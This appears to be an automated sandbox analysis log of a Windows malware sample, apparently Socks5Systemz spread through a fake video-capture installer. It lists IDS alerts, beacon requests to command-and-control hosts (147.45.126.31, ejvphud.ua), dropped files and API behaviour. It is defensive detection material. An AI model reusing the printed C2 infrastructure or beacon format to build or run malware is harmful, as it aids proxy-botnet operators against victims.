Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49827 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49827 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49858 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49887 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49887 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49840 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49840 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49798 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49901 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49901 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49781 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49876 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49913 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49913 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49837 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49837 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49917 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49781 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49917 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49926 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49926 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49881 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49881 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49861 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49861 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49894 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49894 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49798 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49803 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49803 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49833 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49833 -> 147.45.126.31:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49778 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49778 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49922 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49922 -> 147.45.126.31:80
                    Source: Malware configuration extractorURLs: ejvphud.ua
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 46.8.225.74:2023
                    Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknown | UDP traffic detected without corresponding DNS query: 91.211.247.248
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | Code function: 4_2_02DB72AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,4_2_02DB72AB
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global traffic | DNS traffic detected: DNS query: ejvphud.ua
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://147.45.126.31/
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://147.45.126.31/46122658-3693405117-2476756634-1002k
                    Source: videocapturesolution32.exe, 00000004.00000002.2974756897.0000000003619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://147.45.126.31/sea
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1706758940.0000000002111000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1706685088.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000002.2973496782.0000000002111000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000002.2973434034.000000000051F000.00000004.00000020.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000002.2973924658.0000000002228000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000003.1708897906.0000000003180000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000003.1708982513.0000000002228000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://tintguide.com/ru/support.html
                    Source: AbC0LBkVhr.tmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU
                    Source: is-GSMNO.tmp.1.dr | Binary or memory string: DirectDrawCreateExmemstr_09f4bb4f-9
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_0042F518 NtdllDefWindowProc_A | 1_2_0042F518
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_00423B7C NtdllDefWindowProc_A | 1_2_00423B7C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_00478554 NtdllDefWindowProc_A | 1_2_00478554
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_004125D0 NtdllDefWindowProc_A | 1_2_004125D0
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_004573B4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A | 1_2_004573B4
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_0042E92C: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError | 1_2_0042E92C
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx | 0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx | 1_2_004555B8
                    Source: Joe Sandbox View | Dropped File: C:\ProgramData\EShineEncoder\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 0040595C appears 116 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00403400 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00406AB4 appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00445DCC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 004344D4 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 0044609C appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00408BFC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00457D3C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00403494 appears 82 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 004078E4 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00453318 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00457B30 appears 94 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: String function: 00403684 appears 221 times
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | Code function: String function: 02DC8BA0 appears 37 times
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | Code function: String function: 02DD53F0 appears 139 times
                    Source: AbC0LBkVhr.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: AbC0LBkVhr.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: AbC0LBkVhr.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: AbC0LBkVhr.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-U1N6A.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-U1N6A.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-U1N6A.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.4.dr | Static PE information: Number of sections : 19 > 10
                    Source: is-NF0AU.tmp.1.dr | Static PE information: Number of sections : 19 > 10
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs AbC0LBkVhr.exe
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs AbC0LBkVhr.exe
                    Source: AbC0LBkVhr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/31@1/2
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | Code function: 4_2_02DC08C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError | 4_2_02DC08C0
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx | 0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx | 1_2_004555B8
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_00455DE0 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA | 1_2_00455DE0
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | Code function: CreateServiceA | 4_2_004022D9
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Code function: 1_2_0046DF04 GetVersion,CoCreateInstance | 1_2_0046DF04
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exe | Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource | 0_2_00409BEC
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | Code function: 4_2_0040D1AC StartServiceCtrlDispatcherA | 4_2_0040D1AC
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exe | File created: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp
                    Source: Yara match | File source: 4.0.videocapturesolution32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000004.00000000.1722687638.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2974303192.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe, type: DROPPED
                    Source: Yara match | File source: C:\ProgramData\EShineEncoder\EShineEncoder.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-3B09G.tmp, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | File read: C:\Windows\win.ini
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | File read: C:\Windows\System32\drivers\etc\hosts
